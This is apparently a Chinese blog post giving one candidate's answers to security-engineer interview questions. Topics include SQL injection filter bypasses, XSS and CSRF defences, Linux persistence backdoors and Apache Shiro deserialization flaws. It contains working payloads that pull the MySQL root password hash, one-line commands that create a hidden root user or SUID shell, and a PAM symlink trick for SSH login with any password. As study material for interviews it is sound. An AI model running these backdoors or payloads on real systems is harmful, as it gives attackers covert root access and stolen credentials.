合肥做网站开发多少钱,个人网页设计作品模板简单,网站内页301重定向,杭州做绒毛鉴定网站所面试的公司#xff1a;某安全厂商
所在城市#xff1a;浙江宁波
面试职位#xff1a;驻场安全服务工程师
面试官的问题#xff1a;
1、信息收集如何处理子域名爆破的泛解析问题#xff1f;
泛域名解析是#xff1a;*.域名解析到同一IP。域名解析是#xff1a;子域…所面试的公司某安全厂商
所在城市浙江宁波
面试职位驻场安全服务工程师
面试官的问题
1、信息收集如何处理子域名爆破的泛解析问题
泛域名解析是*.域名解析到同一IP。域名解析是子域名.域名解析到同一IP。
解决方式IP黑名单首先访问一个随机的并不存在的域通过返回的结果判断是否存在泛解析确定存在泛解析后不断的生成随机域名并发送请求将每次返回的IP和TTL记录下来直到大部分的IP出现次数都大于两次则IP黑名单收集完成。 而后使用域名字典进行爆破爆破过程中根据IP黑名单进行过滤同时比较TTL在泛解析记录中TTL是相同的如果TTL不相同则不是泛解析记录。
2、访问百度都涉及到哪些协议
HTTP当你在浏览器中输入百度的网址时浏览器会发送HTTP请求到百度的服务器请求获取网页内容。HTTP协议定义了客户端和服务器之间的通信规则和格式。DNS在发送HTTP请求之前浏览器需要将百度的域名URL转换为服务器的IP地址。这个转换过程通过DNS协议实现。浏览器会向DNS服务器发送请求以查询与百度域名对应的IP地址。TCP/IPTCP/IP协议是互联网通信的基础协议。在打开百度网站时HTTP请求会被封装在TCP/IP协议中进行传输。TCP协议提供可靠的连接确保数据的完整性和顺序。IP协议则负责将数据包传输到目标服务器的IP地址。SSL/TLS当使用HTTPS访问百度网站时通信采用SSL/TLS协议进行加密确保数据传输的安全性。SSL/TLS协议使用公钥加密和私钥解密的技术防止数据在传输过程中被窃听或篡改。
3、sqlmap —os-shell的原理
使用此条命令必须获取到目标站点的绝对路径且当前数据库权限必须是dbasa。工作原理是使用 into outfile()函数去写一个可以进行文件上传的 php文件再根据这个文件写了一个木马通过木马进行命令执行。 其条件必须具备以下几点 1已知目标站点的绝对路径 2已知目标站点的脚本语言 3当前数据库权限必须是dbasa权限
4、过滤逗号的SQL注入如何绕过
在使用盲注的时候需要使用到substr(),mid(),limit。这些都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决: select substr(database() from 1 for 1);select mid(database() from 1 for 1);
使用join union select 1,2 #等价于union select from (select 1)a join (select 2)b
使用like select ascii(mid(user(),1,1))80 #等价于select user() like ‘r%’
其他绕过方式 select from table1 where id 1 and exists (select from table2 where ord(substring(username from 1 for 1)97);
127’ UNION SELECT FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
select case when substring((select password from mysql.user where user’root’) from 1 for 1)’e’ then sleep(5) else 0 end #
substring((select password from mysql.user where user’root’) from -1’e’
5、防止XSS攻击从前端后端两个角度 前端用户输入特殊字符过滤转义为html实体用户输出编码
后端实体化编码函数过滤限制字符长度 6、samesite了解过吗怎么去防御CSRF Chrome 51 开始浏览器的 Cookie 新增加了一个SameSite属性用来防止 CSRF 攻击 和用户追踪第三方恶意获取cookie限制第三方 Cookie从而减少安全风险。
SameSite属性可以设置三个值Strict、Lax、None。
Strict严格完全禁止第三方获取cookie跨站点时任何情况下都不会发送cookie只有当前网页的 URL 与请求目标一致才会带上 Cookie。这个规则过于严格可能造成非常不好的用户体验。比如当前网页有一个 GitHub 链接用户点击跳转就不会带有 GitHub 的 Cookie跳转过去总是未登陆状态。 Set-Cookie: CookieNameCookieValue; SameSiteStrict;
Lax防范跨站大多数情况下禁止获取cookie除非导航到目标网址的GET请求链接、预加载、GET表单设置了Strict或Lax以后基本就杜绝了 CSRF 攻击。当然前提是用户浏览器支持 SameSite 属性。 SameSite属性的默认SameSiteLax 【该操作适用于2019年2月4号谷歌发布Chrome 80稳定版之后的版本】 Set-Cookie: CookieNameCookieValue; SameSiteLax;
None没有限制。
7、Linux常见后门
这个真的挺多的...
一句话添加用户和密码 添加普通用户 创建一个用户名guest密码123456的普通用户 useradd -p openssl passwd -1 -salt salt 123456 guestuseradd -p 方法 是用来存放可执行的系统命令,”$()”也可以存放命令执行语句useradd -p “$(openssl passwd -1 123456)” guest
添加root用户 创建一个用户名guest密码123456的root用户 useradd -p openssl passwd -1 -salt salt 123456 guest -o -u 0 -g root -G root -s /bin/bash -d /home/test
SUID Shell Suid shell是一种可用于以拥有者权限运行的shell。 配合普通用户权限使用 cp /bin/bash /tmp/shellchmod us /tmp/shell
使用guest用户登录就可疑获取root权限。
备注bash2针对suid做了一些防护措施需要使用-p参数来获取一个root shell。另外普通用户执行这个SUID shell时一定要使用全路径。
ssh公私钥免密登录 在客户端上生成一对公私钥然后把公钥放到服务器上~/.ssh/authorized_keys保留私钥。当ssh登录时ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。 客户端 ssh-keygen -t rsa
进入/root/.ssh/文件夹查看文件夹的内容 其中 id_rsa为私钥id_rsa.pub为公钥接下来打开id_rsa.pub将内容复制到服务器。将id_rsa.pub的内容追加到/root/.ssh/authorized_keys内配置完成。
软连接 在sshd服务配置运行PAM认证的前提下PAM配置文件中控制标志为sufficient时只要pam_rootok模块检测uid为0即root权限即可成功认证登陆。通过软连接的方式实质上PAM认证是通过软连接的文件名 /tmp/su 在/etc/pam.d/目录下寻找对应的PAM配置文件(如: /etc/pam.d/su)任意密码登陆的核心是auth sufficient pam_rootok.so所以只要PAM配置文件中包含此配置即可SSH任意密码登陆除了su中之外还有chsh、chfn同样可以。 在目标服务器上执行一句话后门 ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort8888
执行完之后任何一台机器ssh rootIP -p 8888输入任意密码成功登录。
SSH wrapper 首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候正则匹配会失败于是执行下一句启动/usr/bin/sshd这是原始sshd。原始的sshd监听端口建立了tcp连接后会fork一个子进程处理具体工作。这个子进程没有什么检验而是直接执行系统默认的位置的/usr/sbin/sshd这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字getpeername能真的获取到客户端的TCP源端口如果是19526就执行sh给个shell 简单点就是从sshd fork出一个子进程输入输出重定向到套接字并对连过来的客户端端口进行了判断。
strace后门 通过命令替换动态跟踪系统调用和数据可以用来记录用户ssh、su、sudo的操作。
crontab反弹shell crontab命令用于设置周期性被执行的指令。新建shell脚本利用脚本进行反弹。
openssh后门 利用openssh后门设置SSH后门密码及root密码记录位置隐蔽性较强不易被发现。
rookit后门 Mafix是一款常用的轻量应用级别Rootkits是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。 利用方法安装完成后使用ssh 用户IP -P 配置的端口即可远程登录。
8、shiro相关漏洞
shiro550 Apache Shiro框架提供了记住密码的功能(RememberMe)用户登录成功后会生成经过加密并编码的Cookie在服务端对rememberMe的Cookie值先base64解码然后AES解密再反序列化AES是硬编码的就导致了反序列化RCE漏洞。
shiro721 Apache Shiro RememberMe Cookie默认通过AES-128-CBC模式加密这种加密方式容易受到Padding Oracle AttackOracle填充攻击利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀然后精心构造 RememberMe Cookie 值来实现反序列化漏洞攻击。
先使用合法账号进行登录勾选remember Me然后使用bp抓包 然后获取到cookie将remember me字段复制下利用工具生成恶意的rememberme。
550和721区别 550不需要登录721需要登录获取正确的cookie550是因为aes密钥是硬编码所以直接可以构造payload而721是利用Oracle填充攻击将正确的cookie作为攻击前缀从而生成攻击payload。 利用漏洞时550只需要一个url就可以利用工具实现检测和攻击721需输入url提供一个有效的rememberMe Cookie。
面试结果一面通过等待二面中。
面试难度适中。
给大家的建议一定要多多拓展知识的宽度。 申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法。